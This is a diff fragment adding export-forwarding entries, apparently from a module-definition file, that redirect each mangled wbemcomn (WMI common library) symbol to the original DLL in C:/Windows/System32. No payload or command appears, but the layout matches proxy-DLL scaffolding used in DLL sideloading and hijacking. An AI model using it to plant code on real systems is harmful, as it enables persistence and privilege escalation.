+    ??4CFlexQueue@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CFlexQueue@@QEAAAEAV0@AEBV0@@Z @267
+    ??4CHaltable@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CHaltable@@QEAAAEAV0@AEBV0@@Z @268
+    ??4CHex@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CHex@@QEAAAEAV0@$$QEAV0@@Z @269
+    ??4CHex@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CHex@@QEAAAEAV0@AEBV0@@Z @270
+    ??4CIdentitySecurity@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CIdentitySecurity@@QEAAAEAV0@AEBV0@@Z @271
+    ??4CIdentityTest@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CIdentityTest@@QEAAAEAV0@AEBV0@@Z @272
+    ??4CInCritSec@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CInCritSec@@QEAAAEAV0@AEBV0@@Z @273
+    ??4CInsertionString@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CInsertionString@@QEAAAEAV0@$$QEAV0@@Z @274
+    ??4CInsertionString@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CInsertionString@@QEAAAEAV0@AEBV0@@Z @275
+    ??4CInstructionQueue@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CInstructionQueue@@QEAAAEAV0@AEBV0@@Z @276
+    ??4CInstructionTest@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CInstructionTest@@QEAAAEAV0@$$QEAV0@@Z @277
+    ??4CInstructionTest@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CInstructionTest@@QEAAAEAV0@AEBV0@@Z @278
+    ??4CLifeControl@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CLifeControl@@QEAAAEAV0@$$QEAV0@@Z @279
+    ??4CLifeControl@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CLifeControl@@QEAAAEAV0@AEBV0@@Z @280
+    ??4CLike@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CLike@@QEAAAEAV0@AEBV0@@Z @281
+    ??4CLimitControl@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CLimitControl@@QEAAAEAV0@AEBV0@@Z @282
+    ??4CMRCICompression@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CMRCICompression@@QEAAAEAV0@AEBV0@@Z @283
+    ??4CMRCIControl@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CMRCIControl@@QEAAAEAV0@$$QEAV0@@Z @284
+    ??4CMRCIControl@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CMRCIControl@@QEAAAEAV0@AEBV0@@Z @285
+    ??4CMUILocale@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CMUILocale@@QEAAAEAV0@$$QEAV0@@Z @286
+    ??4CMUILocale@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CMUILocale@@QEAAAEAV0@AEBV0@@Z @287
+    ??4CMUILocaleList@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CMUILocaleList@@QEAAAEAV0@AEBV0@@Z @288
+    ??4CMemoryLog@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CMemoryLog@@QEAAAEAV0@$$QEAV0@@Z @289
+    ??4CMemoryLog@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CMemoryLog@@QEAAAEAV0@AEBV0@@Z @290
+    ??4CMinMaxLimitControl@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CMinMaxLimitControl@@QEAAAEAV0@$$QEAV0@@Z @291
+    ??4CMinMaxLimitControl@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CMinMaxLimitControl@@QEAAAEAV0@AEBV0@@Z @292
+    ??4CNtAce@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CNtAce@@QEAAAEAV0@AEBV0@@Z @293
+    ??4CNtAcl@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CNtAcl@@QEAAAEAV0@AEBV0@@Z @294
+    ??4CNtSecurity@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CNtSecurity@@QEAAAEAV0@$$QEAV0@@Z @295
+    ??4CNtSecurity@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CNtSecurity@@QEAAAEAV0@AEBV0@@Z @296
+    ??4CNtSecurityDescriptor@@QEAAAEAV0@AEAV0@@Z=C:/Windows/System32/wbemcomn.??4CNtSecurityDescriptor@@QEAAAEAV0@AEAV0@@Z @297
+    ??4CNtSid@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CNtSid@@QEAAAEAV0@AEBV0@@Z @298
+    ??4CPersistentConfig@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CPersistentConfig@@QEAAAEAV0@$$QEAV0@@Z @299
+    ??4CPersistentConfig@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CPersistentConfig@@QEAAAEAV0@AEBV0@@Z @300
+    ??4CPropertyName@@QEAAXAEBU_tag_WbemPropertyName@@@Z=C:/Windows/System32/wbemcomn.??4CPropertyName@@QEAAXAEBU_tag_WbemPropertyName@@@Z @301
+    ??4CPropertyName@@QEAAXAEBV0@@Z=C:/Windows/System32/wbemcomn.??4CPropertyName@@QEAAXAEBV0@@Z @302
+    ??4CPublishWMIOperationEvent@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CPublishWMIOperationEvent@@QEAAAEAV0@AEBV0@@Z @303
+    ??4CQl1ParseSink@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CQl1ParseSink@@QEAAAEAV0@$$QEAV0@@Z @304
+    ??4CQl1ParseSink@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CQl1ParseSink@@QEAAAEAV0@AEBV0@@Z @305
+    ??4CRegistryMinMaxLimitControl@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CRegistryMinMaxLimitControl@@QEAAAEAV0@$$QEAV0@@Z @306
+    ??4CRegistryMinMaxLimitControl@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CRegistryMinMaxLimitControl@@QEAAAEAV0@AEBV0@@Z @307
+    ??4CSafeArray@@QEAAAEAV0@AEAV0@@Z=C:/Windows/System32/wbemcomn.??4CSafeArray@@QEAAAEAV0@AEAV0@@Z @308
+    ??4CSmallArrayBlob@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CSmallArrayBlob@@QEAAAEAV0@$$QEAV0@@Z @309
+    ??4CSmallArrayBlob@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CSmallArrayBlob@@QEAAAEAV0@AEBV0@@Z @310
+    ??4CStaticCritSec@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CStaticCritSec@@QEAAAEAV0@AEBV0@@Z @311
+    ??4CTextTemplate@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CTextTemplate@@QEAAAEAV0@AEBV0@@Z @312
+    ??4CTimerGenerator@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CTimerGenerator@@QEAAAEAV0@AEBV0@@Z @313
+    ??4CTimerInstruction@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CTimerInstruction@@QEAAAEAV0@AEBV0@@Z @314
+    ??4CTraceSessionControl@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CTraceSessionControl@@QEAAAEAV0@$$QEAV0@@Z @315
+    ??4CTraceSessionControl@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CTraceSessionControl@@QEAAAEAV0@AEBV0@@Z @316
+    ??4CUnk@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CUnk@@QEAAAEAV0@AEBV0@@Z @317
+    ??4CUnkInternal@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CUnkInternal@@QEAAAEAV0@AEBV0@@Z @318
+    ??4CVar@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CVar@@QEAAAEAV0@AEBV0@@Z @319
+    ??4CVarVector@@QEAAAEAV0@AEAV0@@Z=C:/Windows/System32/wbemcomn.??4CVarVector@@QEAAAEAV0@AEAV0@@Z @320
+    ??4CWMITraceSettings@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CWMITraceSettings@@QEAAAEAV0@$$QEAV0@@Z @321
+    ??4CWMITraceSettings@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CWMITraceSettings@@QEAAAEAV0@AEBV0@@Z @322
+    ??4CWQLScanner@@QEAAAEAV0@AEAV0@@Z=C:/Windows/System32/wbemcomn.??4CWQLScanner@@QEAAAEAV0@AEAV0@@Z @323
+    ??4CWStringArray@@QEAAAEAV0@AEAV0@@Z=C:/Windows/System32/wbemcomn.??4CWStringArray@@QEAAAEAV0@AEAV0@@Z @324
+    ??4CWbemCallSecurity@@AEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CWbemCallSecurity@@AEAAAEAV0@AEBV0@@Z @325
+    ??4CWbemCriticalSection@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CWbemCriticalSection@@QEAAAEAV0@AEBV0@@Z @326
+    ??4CWbemInstallObject@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CWbemInstallObject@@QEAAAEAV0@AEBV0@@Z @327
+    ??4CWbemInterval@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CWbemInterval@@QEAAAEAV0@$$QEAV0@@Z @328
+    ??4CWbemInterval@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CWbemInterval@@QEAAAEAV0@AEBV0@@Z @329
+    ??4CWbemTime@@QEAAXAEBV0@@Z=C:/Windows/System32/wbemcomn.??4CWbemTime@@QEAAXAEBV0@@Z @330
+    ??4CWbemTimeSpan@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4CWbemTimeSpan@@QEAAAEAV0@$$QEAV0@@Z @331
+    ??4CWbemTimeSpan@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CWbemTimeSpan@@QEAAAEAV0@AEBV0@@Z @332
+    ??4CWin32DefaultArena@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4CWin32DefaultArena@@QEAAAEAV0@AEBV0@@Z @333
+    ??4MD5@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4MD5@@QEAAAEAV0@$$QEAV0@@Z @334
+    ??4MD5@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4MD5@@QEAAAEAV0@AEBV0@@Z @335
+    ??4QL1_Parser@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4QL1_Parser@@QEAAAEAV0@AEBV0@@Z @336
+    ??4QL_LEVEL_1_RPN_EXPRESSION@@QEAAAEAU0@AEBU0@@Z=C:/Windows/System32/wbemcomn.??4QL_LEVEL_1_RPN_EXPRESSION@@QEAAAEAU0@AEBU0@@Z @337
+    ??4QL_LEVEL_1_TOKEN@@QEAAAEAU0@AEBU0@@Z=C:/Windows/System32/wbemcomn.??4QL_LEVEL_1_TOKEN@@QEAAAEAU0@AEBU0@@Z @338
+    ??4QL_LEVEL_1_TOKEN@@QEAAAEAU0@AEBU_tag_WbemQl1Token@@@Z=C:/Windows/System32/wbemcomn.??4QL_LEVEL_1_TOKEN@@QEAAAEAU0@AEBU_tag_WbemQl1Token@@@Z @339
+    ??4Registry@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4Registry@@QEAAAEAV0@AEBV0@@Z @340
+    ??4SHA256@@QEAAAEAV0@$$QEAV0@@Z=C:/Windows/System32/wbemcomn.??4SHA256@@QEAAAEAV0@$$QEAV0@@Z @341
+    ??4SHA256@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4SHA256@@QEAAAEAV0@AEBV0@@Z @342
+    ??4WString2@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4WString2@@QEAAAEAV0@AEBV0@@Z @343
+    ??4WString2@@QEAAAEAV0@PEBG@Z=C:/Windows/System32/wbemcomn.??4WString2@@QEAAAEAV0@PEBG@Z @344
+    ??4WString@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??4WString@@QEAAAEAV0@AEBV0@@Z @345
+    ??4WString@@QEAAAEAV0@PEBG@Z=C:/Windows/System32/wbemcomn.??4WString@@QEAAAEAV0@PEBG@Z @346
+    ??8CEventLogRecord@@QEAAHAEBV0@@Z=C:/Windows/System32/wbemcomn.??8CEventLogRecord@@QEAAHAEBV0@@Z @347
+    ??8CNtSid@@QEAAHAEAV0@@Z=C:/Windows/System32/wbemcomn.??8CNtSid@@QEAAHAEAV0@@Z @348
+    ??8CPropertyName@@QEAAHAEBU_tag_WbemPropertyName@@@Z=C:/Windows/System32/wbemcomn.??8CPropertyName@@QEAAHAEBU_tag_WbemPropertyName@@@Z @349
+    ??8CVar@@QEAAHAEAV0@@Z=C:/Windows/System32/wbemcomn.??8CVar@@QEAAHAEAV0@@Z @350
+    ??8CVarVector@@QEAAHAEAV0@@Z=C:/Windows/System32/wbemcomn.??8CVarVector@@QEAAHAEAV0@@Z @351
+    ??ACFlexArray@@QEAAAEAPEAXH@Z=C:/Windows/System32/wbemcomn.??ACFlexArray@@QEAAAEAPEAXH@Z @352
+    ??ACFlexArray@@QEBAPEAXH@Z=C:/Windows/System32/wbemcomn.??ACFlexArray@@QEBAPEAXH@Z @353
+    ??ACSmallArrayBlob@@QEBAPEAXH@Z=C:/Windows/System32/wbemcomn.??ACSmallArrayBlob@@QEBAPEAXH@Z @354
+    ??ACVarVector@@QEAAAEAVCVar@@H@Z=C:/Windows/System32/wbemcomn.??ACVarVector@@QEAAAEAVCVar@@H@Z @355
+    ??ACWStringArray@@QEBAPEAGH@Z=C:/Windows/System32/wbemcomn.??ACWStringArray@@QEBAPEAGH@Z @356
+    ??AWString2@@QEBAGH@Z=C:/Windows/System32/wbemcomn.??AWString2@@QEBAGH@Z @357
+    ??AWString@@QEBAGH@Z=C:/Windows/System32/wbemcomn.??AWString@@QEBAGH@Z @358
+    ??BCHex@@QEAAJXZ=C:/Windows/System32/wbemcomn.??BCHex@@QEAAJXZ @359
+    ??BCVar@@QEAA?AU_FILETIME@@XZ=C:/Windows/System32/wbemcomn.??BCVar@@QEAA?AU_FILETIME@@XZ @360
+    ??BCVar@@QEAADXZ=C:/Windows/System32/wbemcomn.??BCVar@@QEAADXZ @361
+    ??BCVar@@QEAAEXZ=C:/Windows/System32/wbemcomn.??BCVar@@QEAAEXZ @362
+    ??BCVar@@QEAAFXZ=C:/Windows/System32/wbemcomn.??BCVar@@QEAAFXZ @363
+    ??BCVar@@QEAAGXZ=C:/Windows/System32/wbemcomn.??BCVar@@QEAAGXZ @364
+    ??BCVar@@QEAAJXZ=C:/Windows/System32/wbemcomn.??BCVar@@QEAAJXZ @365
+    ??BCVar@@QEAAKXZ=C:/Windows/System32/wbemcomn.??BCVar@@QEAAKXZ @366
+    ??BCVar@@QEAAMXZ=C:/Windows/System32/wbemcomn.??BCVar@@QEAAMXZ @367
+    ??BCVar@@QEAANXZ=C:/Windows/System32/wbemcomn.??BCVar@@QEAANXZ @368
+    ??BCVar@@QEAAPEADXZ=C:/Windows/System32/wbemcomn.??BCVar@@QEAAPEADXZ @369
+    ??BCVar@@QEAAPEAGXZ=C:/Windows/System32/wbemcomn.??BCVar@@QEAAPEAGXZ @370
+    ??BCVar@@QEAAPEAU_GUID@@XZ=C:/Windows/System32/wbemcomn.??BCVar@@QEAAPEAU_GUID@@XZ @371
+    ??BCVar@@QEAAPEAUtagBLOB@@XZ=C:/Windows/System32/wbemcomn.??BCVar@@QEAAPEAUtagBLOB@@XZ @372
+    ??BCVar@@QEAAPEAVCVarVector@@XZ=C:/Windows/System32/wbemcomn.??BCVar@@QEAAPEAVCVarVector@@XZ @373
+    ??BWString2@@QEAAPEAGXZ=C:/Windows/System32/wbemcomn.??BWString2@@QEAAPEAGXZ @374
+    ??BWString2@@QEBAPEBGXZ=C:/Windows/System32/wbemcomn.??BWString2@@QEBAPEBGXZ @375
+    ??BWString@@QEAAPEAGXZ=C:/Windows/System32/wbemcomn.??BWString@@QEAAPEAGXZ @376
+    ??BWString@@QEBAPEBGXZ=C:/Windows/System32/wbemcomn.??BWString@@QEBAPEBGXZ @377
+    ??DCWbemInterval@@QEBA?AV0@N@Z=C:/Windows/System32/wbemcomn.??DCWbemInterval@@QEBA?AV0@N@Z @378
+    ??GCWbemTime@@QEBA?AV0@AEBVCWbemTimeSpan@@@Z=C:/Windows/System32/wbemcomn.??GCWbemTime@@QEBA?AV0@AEBVCWbemTimeSpan@@@Z @379
+    ??GCWbemTime@@QEBA?AVCWbemInterval@@AEBV0@@Z=C:/Windows/System32/wbemcomn.??GCWbemTime@@QEBA?AVCWbemInterval@@AEBV0@@Z @380
+    ??HCWbemInterval@@QEBA?AV0@V0@@Z=C:/Windows/System32/wbemcomn.??HCWbemInterval@@QEBA?AV0@V0@@Z @381
+    ??HCWbemTime@@QEBA?AV0@AEBVCWbemInterval@@@Z=C:/Windows/System32/wbemcomn.??HCWbemTime@@QEBA?AV0@AEBVCWbemInterval@@@Z @382
+    ??HCWbemTime@@QEBA?AV0@AEBVCWbemTimeSpan@@@Z=C:/Windows/System32/wbemcomn.??HCWbemTime@@QEBA?AV0@AEBVCWbemTimeSpan@@@Z @383
+    ??MCWbemInterval@@QEAAHV0@@Z=C:/Windows/System32/wbemcomn.??MCWbemInterval@@QEAAHV0@@Z @384
+    ??MCWbemTime@@QEBAHAEBV0@@Z=C:/Windows/System32/wbemcomn.??MCWbemTime@@QEBAHAEBV0@@Z @385
+    ??MWString2@@QEBAHPEBG@Z=C:/Windows/System32/wbemcomn.??MWString2@@QEBAHPEBG@Z @386
+    ??MWString@@QEBAHPEBG@Z=C:/Windows/System32/wbemcomn.??MWString@@QEBAHPEBG@Z @387
+    ??NCWbemTime@@QEBAHAEBV0@@Z=C:/Windows/System32/wbemcomn.??NCWbemTime@@QEBAHAEBV0@@Z @388
+    ??NWString2@@QEBAHPEBG@Z=C:/Windows/System32/wbemcomn.??NWString2@@QEBAHPEBG@Z @389
+    ??NWString@@QEBAHPEBG@Z=C:/Windows/System32/wbemcomn.??NWString@@QEBAHPEBG@Z @390
+    ??OCWbemInterval@@QEAAHV0@@Z=C:/Windows/System32/wbemcomn.??OCWbemInterval@@QEAAHV0@@Z @391
+    ??OCWbemTime@@QEBAHAEBV0@@Z=C:/Windows/System32/wbemcomn.??OCWbemTime@@QEBAHAEBV0@@Z @392
+    ??OWString2@@QEBAHPEBG@Z=C:/Windows/System32/wbemcomn.??OWString2@@QEBAHPEBG@Z @393
+    ??OWString@@QEBAHPEBG@Z=C:/Windows/System32/wbemcomn.??OWString@@QEBAHPEBG@Z @394
+    ??PCWbemTime@@QEBAHAEBV0@@Z=C:/Windows/System32/wbemcomn.??PCWbemTime@@QEBAHAEBV0@@Z @395
+    ??PWString2@@QEBAHPEBG@Z=C:/Windows/System32/wbemcomn.??PWString2@@QEBAHPEBG@Z @396
+    ??PWString@@QEBAHPEBG@Z=C:/Windows/System32/wbemcomn.??PWString@@QEBAHPEBG@Z @397
+    ??R?$SZLess@PEBG@@QEBA_NAEBQEBG0@Z=C:/Windows/System32/wbemcomn.??R?$SZLess@PEBG@@QEBA_NAEBQEBG0@Z @398
+    ??RCIdentityTest@@UEAAHPEAVCTimerInstruction@@@Z=C:/Windows/System32/wbemcomn.??RCIdentityTest@@UEAAHPEAVCTimerInstruction@@@Z @399
+    ??RWString2@@QEBA?AV0@HH@Z=C:/Windows/System32/wbemcomn.??RWString2@@QEBA?AV0@HH@Z @400
+    ??RWString@@QEBA?AV0@HH@Z=C:/Windows/System32/wbemcomn.??RWString@@QEBA?AV0@HH@Z @401
+    ??YCWbemInterval@@QEAAXV0@@Z=C:/Windows/System32/wbemcomn.??YCWbemInterval@@QEAAXV0@@Z @402
+    ??YWString2@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??YWString2@@QEAAAEAV0@AEBV0@@Z @403
+    ??YWString2@@QEAAAEAV0@G@Z=C:/Windows/System32/wbemcomn.??YWString2@@QEAAAEAV0@G@Z @404
+    ??YWString2@@QEAAAEAV0@PEBG@Z=C:/Windows/System32/wbemcomn.??YWString2@@QEAAAEAV0@PEBG@Z @405
+    ??YWString@@QEAAAEAV0@AEBV0@@Z=C:/Windows/System32/wbemcomn.??YWString@@QEAAAEAV0@AEBV0@@Z @406
+    ??YWString@@QEAAAEAV0@G@Z=C:/Windows/System32/wbemcomn.??YWString@@QEAAAEAV0@G@Z @407
+    ??YWString@@QEAAAEAV0@PEBG@Z=C:/Windows/System32/wbemcomn.??YWString@@QEAAAEAV0@PEBG@Z @408
+    ??_7?$SZLess@PEBG@@6B@=C:/Windows/System32/wbemcomn.??_7?$SZLess@PEBG@@6B@ @409
+    ??_7C9XAce@@6B@=C:/Windows/System32/wbemcomn.??_7C9XAce@@6B@ @410
+    ??_7CAbstractQl1Parser@@6B@=C:/Windows/System32/wbemcomn.??_7CAbstractQl1Parser@@6B@ @411
+    ??_7CArena@@6B@=C:/Windows/System32/wbemcomn.??_7CArena@@6B@ @412
+    ??_7CBaseAce@@6B@=C:/Windows/System32/wbemcomn.??_7CBaseAce@@6B@ @413
+    ??_7CBasicUnloadInstruction@@6B@=C:/Windows/System32/wbemcomn.??_7CBasicUnloadInstruction@@6B@ @414
+    ??_7CBuffer@@6B@=C:/Windows/System32/wbemcomn.??_7CBuffer@@6B@ @415
+    ??_7CContainerControl@@6B@=C:/Windows/System32/wbemcomn.??_7CContainerControl@@6B@ @416
+    ??_7CExecQueue@@6B@=C:/Windows/System32/wbemcomn.??_7CExecQueue@@6B@ @417
+    ??_7CExecRequest@@6B@=C:/Windows/System32/wbemcomn.??_7CExecRequest@@6B@ @418
+    ??_7CHaltable@@6B@=C:/Windows/System32/wbemcomn.??_7CHaltable@@6B@ @419
+    ??_7CIdentityTest@@6B@=C:/Windows/System32/wbemcomn.??_7CIdentityTest@@6B@ @420
+    ??_7CInstructionTest@@6B@=C:/Windows/System32/wbemcomn.??_7CInstructionTest@@6B@ @421
+    ??_7CLifeControl@@6B@=C:/Windows/System32/wbemcomn.??_7CLifeControl@@6B@ @422
+    ??_7CLimitControl@@6B@=C:/Windows/System32/wbemcomn.??_7CLimitControl@@6B@ @423
+    ??_7CMinMaxLimitControl@@6B@=C:/Windows/System32/wbemcomn.??_7CMinMaxLimitControl@@6B@ @424
+    ??_7CNtAce@@6B@=C:/Windows/System32/wbemcomn.??_7CNtAce@@6B@ @425
+    ??_7CQl1ParseSink@@6B@=C:/Windows/System32/wbemcomn.??_7CQl1ParseSink@@6B@ @426
+    ??_7CRegistryMinMaxLimitControl@@6B@=C:/Windows/System32/wbemcomn.??_7CRegistryMinMaxLimitControl@@6B@ @427
+    ??_7CTimerGenerator@@6B@=C:/Windows/System32/wbemcomn.??_7CTimerGenerator@@6B@ @428
+    ??_7CTimerInstruction@@6B@=C:/Windows/System32/wbemcomn.??_7CTimerInstruction@@6B@ @429
+    ??_7CUnk@@6B@=C:/Windows/System32/wbemcomn.??_7CUnk@@6B@ @430
+    ??_7CUnkInternal@@6B@=C:/Windows/System32/wbemcomn.??_7CUnkInternal@@6B@ @431
+    ??_7CWbemCallSecurity@@6B@=C:/Windows/System32/wbemcomn.??_7CWbemCallSecurity@@6B@ @432
+    ??_7CWin32DefaultArena@@6B@=C:/Windows/System32/wbemcomn.??_7CWin32DefaultArena@@6B@ @433
+    ??_7QL1_Parser@@6B@=C:/Windows/System32/wbemcomn.??_7QL1_Parser@@6B@ @434
+    ??_7QL_LEVEL_1_RPN_EXPRESSION@@6B@=C:/Windows/System32/wbemcomn.??_7QL_LEVEL_1_RPN_EXPRESSION@@6B@ @435
+    ??_FCBuffer@@QEAAXXZ=C:/Windows/System32/wbemcomn.??_FCBuffer@@QEAAXXZ @436
+    ??_FCEventLog@@QEAAXXZ=C:/Windows/System32/wbemcomn.??_FCEventLog@@QEAAXXZ @437
+    ??_FCFlexArray@@QEAAXXZ=C:/Windows/System32/wbemcomn.??_FCFlexArray@@QEAAXXZ @438
+    ??_FCFlexQueue@@QEAAXXZ=C:/Windows/System32/wbemcomn.??_FCFlexQueue@@QEAAXXZ @439
+    ??_FCNtAcl@@QEAAXXZ=C:/Windows/System32/wbemcomn.??_FCNtAcl@@QEAAXXZ @440
+    ??_FCTextTemplate@@QEAAXXZ=C:/Windows/System32/wbemcomn.??_FCTextTemplate@@QEAAXXZ @441
+    ??_FCUnk@@QEAAXXZ=C:/Windows/System32/wbemcomn.??_FCUnk@@QEAAXXZ @442
+    ??_FCWStringArray@@QEAAXXZ=C:/Windows/System32/wbemcomn.??_FCWStringArray@@QEAAXXZ @443
+    ?AbortCompression@CMRCIControl@@QEAAXXZ=C:/Windows/System32/wbemcomn.?AbortCompression@CMRCIControl@@QEAAXXZ @444
+    ?AbortRequested@CMRCIControl@@QEAAHXZ=C:/Windows/System32/wbemcomn.?AbortRequested@CMRCIControl@@QEAAHXZ @445
+    ?Access@CSafeArray@@QEAAJPEAPEAX@Z=C:/Windows/System32/wbemcomn.?Access@CSafeArray@@QEAAJPEAPEAX@Z @446
+    ?AccessCheck@CIdentitySecurity@@QEAAHXZ=C:/Windows/System32/wbemcomn.?AccessCheck@CIdentitySecurity@@QEAAHXZ @447
+    ?AccessRawArray@CVarVector@@QEAAJPEAPEAX@Z=C:/Windows/System32/wbemcomn.?AccessRawArray@CVarVector@@QEAAJPEAPEAX@Z @448
+    ?Add@CFlexArray@@QEAAHPEAX@Z=C:/Windows/System32/wbemcomn.?Add@CFlexArray@@QEAAHPEAX@Z @449
+    ?Add@CMinMaxLimitControl@@UEAAJKKPEAK@Z=C:/Windows/System32/wbemcomn.?Add@CMinMaxLimitControl@@UEAAJKKPEAK@Z @450
+    ?Add@CVarVector@@QEAAHAEAVCVar@@@Z=C:/Windows/System32/wbemcomn.?Add@CVarVector@@QEAAHAEAVCVar@@@Z @451
+    ?Add@CVarVector@@QEAAHPEAVCVar@@@Z=C:/Windows/System32/wbemcomn.?Add@CVarVector@@QEAAHPEAVCVar@@@Z @452
+    ?Add@CWStringArray@@QEAAHPEBG@Z=C:/Windows/System32/wbemcomn.?Add@CWStringArray@@QEAAHPEBG@Z @453
+    ?AddAce@CNtAcl@@QEAAHPEAVCNtAce@@@Z=C:/Windows/System32/wbemcomn.?AddAce@CNtAcl@@QEAAHPEAVCNtAce@@@Z @454
+    ?AddAggregationProperty@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXAEBVCPropertyName@@@Z=C:/Windows/System32/wbemcomn.?AddAggregationProperty@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXAEBVCPropertyName@@@Z @455
+    ?AddAllAggregationProperties@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXXZ=C:/Windows/System32/wbemcomn.?AddAllAggregationProperties@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXXZ @456
+    ?AddAllProperties@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXXZ=C:/Windows/System32/wbemcomn.?AddAllProperties@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXXZ @457
+    ?AddAppropriateToken@CAbstractQl1Parser@@IEAAXAEBU_tag_WbemQl1Token@@@Z=C:/Windows/System32/wbemcomn.?AddAppropriateToken@CAbstractQl1Parser@@IEAAXAEBU_tag_WbemQl1Token@@@Z @458
+    ?AddBSTR@CSafeArray@@QEAAHPEAG@Z=C:/Windows/System32/wbemcomn.?AddBSTR@CSafeArray@@QEAAHPEAG@Z @459
+    ?AddBool@CSafeArray@@QEAAHF@Z=C:/Windows/System32/wbemcomn.?AddBool@CSafeArray@@QEAAHF@Z @460
+    ?AddByte@CSafeArray@@QEAAHE@Z=C:/Windows/System32/wbemcomn.?AddByte@CSafeArray@@QEAAHE@Z @461
+    ?AddChild@CClientOpsNode@@QEAAXPEAV1@@Z=C:/Windows/System32/wbemcomn.?AddChild@CClientOpsNode@@QEAAXPEAV1@@Z @462
+    ?AddCulture@CMUILocaleList@@AEAAJPEBGW4LocaleType@CMUILocale@@K@Z=C:/Windows/System32/wbemcomn.?AddCulture@CMUILocaleList@@AEAAJPEBGW4LocaleType@CMUILocale@@K@Z @463
